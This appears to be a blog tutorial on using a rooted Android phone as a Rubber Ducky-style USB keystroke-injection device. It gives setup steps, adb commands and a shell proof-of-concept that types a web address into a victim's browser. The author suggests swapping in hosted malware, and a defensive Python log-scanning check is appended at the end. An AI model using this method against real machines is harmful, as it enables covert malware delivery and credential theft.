Your Android as Rubber Ducky against targeted Android device or PC
I learned basic Android hacking when I started my career in cybersecurity. When I was in college, I attended a seminar about how people can be hacked using their smartphones. The speaker demonstrated a tool called AhMyth (Android Remote Administration Tool), a hacking tool used to create malicious Android apps or APK files. To exploit the victim, this needs to be installed on their phone without their knowledge. It can also be hidden using another app so that the victim doesn’t realize their device has been compromised.
Since then, I became curious about hacking Android devices. In 2022, I discovered Android HID. Android HID (Human Interface Device) refers to the use of Android devices as HID devices, or the ability for Android devices to interact with other HID-compliant devices.
Android as an HID Device
In this case, Android devices can function as a Human Interface Device. This typically involves using Android as a keyboard, mouse, or joystick that can interface with a host device (such as a computer, tablet, or another Android device) via USB or Bluetooth. This is achieved by using the Android operating system’s support for HID protocols.
For example:
- Android phones or tablets can be used to send keyboard or mouse input to other devices by enabling the HID profile.
- Android apps can be designed to emulate input devices like keyboards, mice, or game controllers.
How is this used in attacks?
Primarily through malicious USB or Bluetooth connections, where the Android device pretends to be a keyboard, mouse, or other Human Interface Device (HID). This is a form of attack that takes advantage of how these devices are trusted by the operating systems they connect to.
In this article, I will show you how it’s done.
Prerequisites
- rooted Android phone with HID kernel support (e.g. NetHunter ROM)
- OTG cable
Some HID attacks use NetHunter support. However, its usage is too complicated and technical, so in this post, I will show you the simpler method (easy way).
Now let’s jump into the tutorial.
- So, imagine you’ve already installed NetHunter on your Android device successfully. Now, you need to download and install the USB Gadget Tool from GitHub. This application will help enable HID on your Android.
GitHub - tejado/android-usb-gadget: Convert your Android phone to any USB device you like! USB Gadget Tool allows you to create and activate USB device roles, like a mouse or a keyboard. 🛠🛡📱
- Open the USB Gadget Tool app on your rooted Android phone. This is how it looks by default:
- If you look at the bottom ribbon, the Functions section is empty (*). This is because hid.keyboard and hid.mouse are still disabled. To enable our HID, click the top ribbon. Then you will see the Add Function button.
- We need hid.keyboard and hid.mouse, so enable or add them.
- Once you enable the keyboard and mouse, you will see at the bottom ribbon, under Functions, that they are now enabled.
- Install a terminal app on your rooted Android. For this article, I used the Termux terminal.
- And you need to log in as root by running the command su.
Prepare your Scripts
We need to create a script to automate attacks on the target device. To do this, you need to be familiar with the victim’s device navigation. For example, first, the position or location of browsers like Google Chrome on the device; second, the position of Settings.
You can refer to this script for the commands needed to navigate the device when executing the scripts.
GitHub - anbud/DroidDucky: SImple duckyscript interpreter in Bash.
- Transfer the hid-gadget-test and droidducky.sh to your rooted device using adb. You need to use a PC.
```
Microsoft Windows [Version 10.0.22631.4460]
(c) Microsoft Corporation. All rights reserved.

F:\Demo\.Android-HID\payas0>dir hid-gadget-test hid-pixel7pro
```
Run adb push hid-gadget-test /data/local/tmp
```
Microsoft Windows [Version 10.0.22631.4460]
(c) Microsoft Corporation. All rights reserved.

F:\Demo\.Android-HID\payas0>adb push hid-gadget-test /data/local/tmp
hid-gadget-test: 1 file pushed, 0 skipped. 9.0 MB/s (17674 bytes in 0.002s)
```
Next transfer the bash script you created.
Run adb push your-batch-script.sh /data/local/tmp
```
Microsoft Windows [Version 10.0.22631.4460]
(c) Microsoft Corporation. All rights reserved.

F:\Demo\.Android-HID\payas0>adb push your-batch-script.sh /data/local/tmp
your-batch-script.sh: 1 file pushed, 0 skipped. 1.3 MB/s (1079 bytes in 0.001s)
```
- And here’s the script I created for the PoC:
```
#!/system/bin/sh
# Arrow-key navigation, then confirm the selection
echo down | ./hid-gadget-test /dev/hidg1 keyboard
echo down | ./hid-gadget-test /dev/hidg1 keyboard
echo left | ./hid-gadget-test /dev/hidg1 keyboard
echo enter | ./hid-gadget-test /dev/hidg1 keyboard
sleep 0.2
# Ctrl+N, then Ctrl+L
echo left-ctrl n | ./hid-gadget-test /dev/hidg1 keyboard
sleep 0.5
echo left-ctrl l | ./hid-gadget-test /dev/hidg1 keyboard
sleep 0.6
# Type the address, then press Enter
echo p h - p a y a s 0 | ./hid-gadget-test /dev/hidg1 keyboard
echo period | ./hid-gadget-test /dev/hidg1 keyboard
echo g i t h u b | ./hid-gadget-test /dev/hidg1 keyboard
echo period | ./hid-gadget-test /dev/hidg1 keyboard
echo i o | ./hid-gadget-test /dev/hidg1 keyboard
sleep 0.3
echo enter | ./hid-gadget-test /dev/hidg1 keyboard
```
- And here’s the full video demonstration. This is a simple PoC only, but you can create your own, like hosting a live malware on your website, then executing it using HID attacks.
Keynotes
USB HID Attack (Rubber Ducky Attack):
An Android device with HID (Human Interface Device) capabilities can impersonate a keyboard when connected to a computer via USB. This allows an attacker to send keystrokes and execute commands on the target system without the user’s knowledge. The attacker may use this access to perform malicious actions, such as downloading malware, stealing passwords, or gaining remote control of the device. Often, social engineering tactics are used to trick the user into connecting the Android device to the computer, making it appear harmless while hiding its malicious intent.
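One defender-side check for the behaviour described above, as an added example that is not part of the original post: on a Linux host, scan the kernel log for USB HID keyboards as they are bound and flag any whose vendor/product ID is not in an inventory of expected keyboards. The log lines, the IDs and the names `ALLOWED_KEYBOARDS` and `find_unexpected_keyboards` are constructed for illustration.

```python
import re

# Kernel message logged when a USB HID interface is bound, for example:
# [ 3.12] hid-generic 0003:046D:C31C.0001: input,hidraw0: USB HID v1.10 Keyboard [Name] on usb-...
HID_LINE = re.compile(
    r"\[\s*(?P<ts>\d+\.\d+)\] hid-generic [0-9A-F]{4}:(?P<vid>[0-9A-F]{4}):"
    r"(?P<pid>[0-9A-F]{4})\.[0-9A-F]{4}: .*?USB HID v[\d.]+ "
    r"(?P<kind>\w+) \[(?P<name>[^\]]*)\]"
)

# Assumption: (VID, PID) pairs of the keyboards this host is expected to see.
ALLOWED_KEYBOARDS = {("046D", "C31C")}


def find_unexpected_keyboards(log_lines, allowed=ALLOWED_KEYBOARDS):
    """Return one finding per keyboard interface whose VID:PID is not allowlisted."""
    findings = []
    for line in log_lines:
        m = HID_LINE.search(line)
        if not m or m["kind"] != "Keyboard":
            continue  # not a HID bind message, or a mouse/other interface
        if (m["vid"], m["pid"]) not in allowed:
            findings.append({
                "ts": float(m["ts"]),  # seconds since boot
                "vid": m["vid"],
                "pid": m["pid"],
                "name": m["name"],
            })
    return findings


# Constructed sample: the built-in keyboard at boot, then a phone that
# enumerates a keyboard and a mouse interface about 13 minutes later.
SAMPLE_LOG = [
    "[    3.120000] hid-generic 0003:046D:C31C.0001: input,hidraw0: USB HID v1.10 Keyboard [Example Desk Keyboard] on usb-0000:00:14.0-3/input0",
    "[  812.400000] usb 1-2: new high-speed USB device number 7 using xhci_hcd",
    "[  812.560000] hid-generic 0003:1234:5678.0005: input,hidraw3: USB HID v1.01 Keyboard [Example Phone] on usb-0000:00:14.0-2/input0",
    "[  812.570000] hid-generic 0003:1234:5678.0006: input,hidraw4: USB HID v1.01 Mouse [Example Phone] on usb-0000:00:14.0-2/input1",
]

if __name__ == "__main__":
    for f in find_unexpected_keyboards(SAMPLE_LOG):
        print(f"[{f['ts']:.2f}s] unexpected keyboard {f['vid']}:{f['pid']} ({f['name']})")
```

VID:PID values are reported by the device itself, so this flags unexpected hardware but should be paired with a control that blocks new input devices by default, such as USBGuard on Linux.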
Conclusion:
In short, Android HID can be used by attackers to manipulate other devices by pretending to be an input device (keyboard, mouse, etc.) and performing unwanted actions, which could lead to data theft or system compromise.